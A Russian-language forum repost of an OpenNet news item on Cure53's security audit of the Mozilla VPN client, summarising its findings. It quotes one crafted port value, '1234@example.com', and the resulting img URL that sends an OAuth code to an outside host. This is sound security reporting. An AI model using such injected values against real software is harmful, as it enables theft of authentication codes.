Опубликованы результаты аудита VPN-клиента Mozilla
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
Компания Mozilla объявила о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS. Работу Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN-сервису производится при помощи протокола WireGuard.
Аудит выполнен компанией Cure53, в своё время проводившей аудит проектов NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В ходе проверки выявлено 16 проблем с безопасностью, 8 из которых имели характер рекомендаций, 5 присвоен низкий уровень опасности, двум - средний, а одной - высокий.
При этом лишь одна проблема со средним уровнем опасности была отнесена к категории уязвимостей, так как только она была пригодна для эксплуатации.
Указанная проблема приводила к утечке сведений о применений VPN в коде для определения captive portal из-за отправки незашифрованных прямых запросов по HTTP, передаваемых вне VPN-туннеля и раскрывающих основной IP-адрес пользователя в случае если атакующий может контролировать транзитный трафик. Проблема решается отключением режима определения captive portal в настройках.
Вторая проблема среднего уровня опасности связана с отсутствием должной чистки нечисловых значений в номере порта, что позволяет организовать утечку параметров аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1.
Третья проблема, помеченная как опасная, позволяет любому локальному приложению без аутентификации обратиться к VPN-клиенту через WebSocket, привязанный к localhost. В качестве примера показано, как при активном VPN-клиенте любой сайт мог организовать создание и отправку скриншота через генерацию события screen_capture. Проблема не отнесена к категории уязвимостей, так как WebSocket использовался только во внутренних тестовых сборках и применение данного канала связи лишь планировалось в будущем для организации взаимодействия с браузерным дополнением.
===========
Источник:
OpenNet.RU
===========
Похожие новости
- Главная ссылка к новости (https://blog.mozilla.org/en/mo...)
- OpenNews: В Mozilla VPN появилась поддержка Linux и macOS
- OpenNews: Официально запущен сервис Mozilla VPN
- OpenNews: Компания ExpressVPN открыла наработки, связанные с VPN-протоколом Lightway
- OpenNews: Обновление OpenVPN 2.5.3. Отключение Opera VPN и VyprVPN в РФ
- OpenNews: Continent - VPN клиент/сервер и зашифрованный файл-контейнер
Похожие новости:
- Компания ExpressVPN открыла наработки, связанные с VPN-протоколом Lightway
- Обновление голосовых данных Mozilla Common Voice 7.0
- [Сетевые технологии] Путь Namex IXP к IP-фабрикам
- [Информационная безопасность, Системное администрирование, Сетевые технологии] SoftEther VPN — быстрая настройка
- [Сетевые технологии] Бесплатный персональный OpenVPN-сервер на базе Oracle Cloud
- [Системное администрирование, Программирование] Ускоряем старый добрый emule без открытия портов и IP
- [Разработка под Linux] Архитектура контейнеров, часть 1. Почему важно понимать разницу между пространством пользователя и пространством ядра
- [Сетевые технологии] Маршрутизация IPv6 через WireGuard с поддержкой SLAAC
- [Информационная безопасность, Сетевые технологии, Законодательство в IT] РКН: вниманию компаний, работающих с Hola!VPN, ExpressVPN, KeepSolid VPN Unlimited, Nord VPN, Speedify VPN, IPVanish VPN
- [Информационная безопасность, Криптография, Серверное администрирование] Инфраструктурой российского DoubleVPN завладели зарубежные спецслужбы
Теги для поиска: #_vpn, #_mozilla
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 11:59
Часовой пояс: UTC + 5
Автор | Сообщение |
---|---|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
Компания Mozilla объявила о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS. Работу Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN-сервису производится при помощи протокола WireGuard. Аудит выполнен компанией Cure53, в своё время проводившей аудит проектов NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В ходе проверки выявлено 16 проблем с безопасностью, 8 из которых имели характер рекомендаций, 5 присвоен низкий уровень опасности, двум - средний, а одной - высокий. При этом лишь одна проблема со средним уровнем опасности была отнесена к категории уязвимостей, так как только она была пригодна для эксплуатации. Указанная проблема приводила к утечке сведений о применений VPN в коде для определения captive portal из-за отправки незашифрованных прямых запросов по HTTP, передаваемых вне VPN-туннеля и раскрывающих основной IP-адрес пользователя в случае если атакующий может контролировать транзитный трафик. Проблема решается отключением режима определения captive portal в настройках. Вторая проблема среднего уровня опасности связана с отсутствием должной чистки нечисловых значений в номере порта, что позволяет организовать утечку параметров аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1. Третья проблема, помеченная как опасная, позволяет любому локальному приложению без аутентификации обратиться к VPN-клиенту через WebSocket, привязанный к localhost. В качестве примера показано, как при активном VPN-клиенте любой сайт мог организовать создание и отправку скриншота через генерацию события screen_capture. Проблема не отнесена к категории уязвимостей, так как WebSocket использовался только во внутренних тестовых сборках и применение данного канала связи лишь планировалось в будущем для организации взаимодействия с браузерным дополнением. =========== Источник: OpenNet.RU =========== Похожие новости
|
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 11:59
Часовой пояс: UTC + 5